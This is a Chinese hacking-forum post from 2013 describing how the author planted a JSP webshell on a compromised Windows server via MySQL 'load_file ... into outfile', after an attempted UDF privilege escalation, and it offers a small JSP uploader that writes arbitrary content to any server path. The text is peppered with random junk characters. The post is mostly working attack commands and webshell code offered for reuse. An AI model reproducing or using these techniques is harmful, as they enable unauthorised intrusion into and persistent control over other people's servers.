找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2477|回复: 0
打印 上一主题 下一主题

解决Win下MySQL root导出Webshell换行符问题

[复制链接]
跳转到指定楼层
楼主
发表于 2013-3-8 21:52:57 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
今天碰到了这么个问题,简单记录一下我的解决方案。
9 ?8 X( R7 [# s. I6 {8 B! }- ~8 b9 O4 S! @; t* V  N8 c% K
首先说一下服务器的环境。服务器的80端口按照标准的虚拟主机来配置的,支持asp,aspx,php,但是不支持php. h7 m* c2 }8 Q7 B( _* h& C3 @
安装了mssql(1433端口),tomcat(8080端口),serv-u(43958端口)和两个mysql(3306端口和3307端口)
) D8 O$ @( {1 k; _8 s' A2 P提权的时候没有sa密码,没有serv-u密码,mysql 5.1首先运行了
! E6 J; K, H' Y, D- J3 C: f1 show variables like '%plugin%';' l; t6 p, ]2 h* }4 d, p
后,根据设置导出dll到C:\Program Files\MySQL\MySQL Server 5.1\lib\成功
( C+ F% w/ g1 ^创建自定义函数似乎被拦截,一直失败。
! j; U8 T9 w1 A9 O后找到tomcat目录,准备写马,asp,aspx,php对tomcat目录:C:/Program Files/cngradms_x86/tomcat/webapps/ROOT/均无写入权限$ g4 u! X: R7 I
测试mysql有写入权限。故上传jsp大马至网站web目录:d:\xxx\fuck.jsp0 o% G6 ~# ^+ M
用mysql执行语句:
4 N0 ~" s' d: s& U$ \9 b0 j1 select load_file('d:\\xxx\\fuck.jsp')  into outfile 'C:\\Program Files\\cngradms_x86\\tomcat\\webapps\\ROOT\\upload\\fuck.jsp'/ L9 T# M' F2 n/ y# O/ O
2 复制代码
6 |( H; R5 C# h* t; V后成功。4 w$ `7 r  G: i; `# K( E7 Y7 ~- V
但是访问后得到如下提示:# o/ d! y0 E9 f; Z
​500页面# d" _; ~" j3 i1 e
+ Y8 k/ e. z6 X7 I- y

1 W, ~" @2 c, \) r4 b明显是MySQL的Win下版本自动添加转义符\n\r了( [* B2 y9 G) z2 f( J
这样导致程序运行的悲剧。8 N/ F* H- N7 c. _' y
从网上找了很多方法,什么update把转义符消掉,enclose巴拉巴拉,反正五花八门就是没一个可以用的。
% k0 O, Z+ U% d* o6 }" ^# Q( f最后弄了这么个小脚本:
2 c: ~) c1 t$ k) j) P01 <%@ page language="java" pageEncoding="gbk"%>, m* F3 F% a5 H7 p4 w7 ?
02 <jsp:directive.page import="java.io.File"/>
' g6 A& l) f1 Q3 C4 h! q8 V03 <jsp:directive.page import="java.io.OutputStream"/>
) m/ u' H' h5 c+ s' X% p& |* L04 <jsp:directive.page import="java.io.FileOutputStream"/>7 I; C% z1 s6 ~& R, L
05 <% int i=0;String method=request.getParameter("act");if(method!=null&&method.equals("yoco")){String url=request.getParameter("url");String text=request.getParameter("smart");File f=new File(url);if(f.exists()){f.delete();}try{OutputStream o=new FileOutputStream(f);o.write(text.getBytes());o.close();}catch(Exception e){i++;%>. `( F3 J8 p: Q
06 error www.2cto.com# f. }$ a( D6 b1 A
07 <%}}if(i==0){%>
1 j' D# _2 q3 Y6 o% `. c: q08 ok# Z! Z4 n. Z2 J
09 <%}%>
5 m5 h7 ~& \9 u1 p) q10 <form action='?act=yoco' method='post'><input size="100" value="<%=application.getRealPath("/") %>" name="url"><br><textarea rows="20" cols="80" name="smart">$ _! E1 Z2 V- y1 s
就可以避免转义符让JSP的马儿运行500错误了。
8 F1 b3 F# Z$ r4 L" y( v( j
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表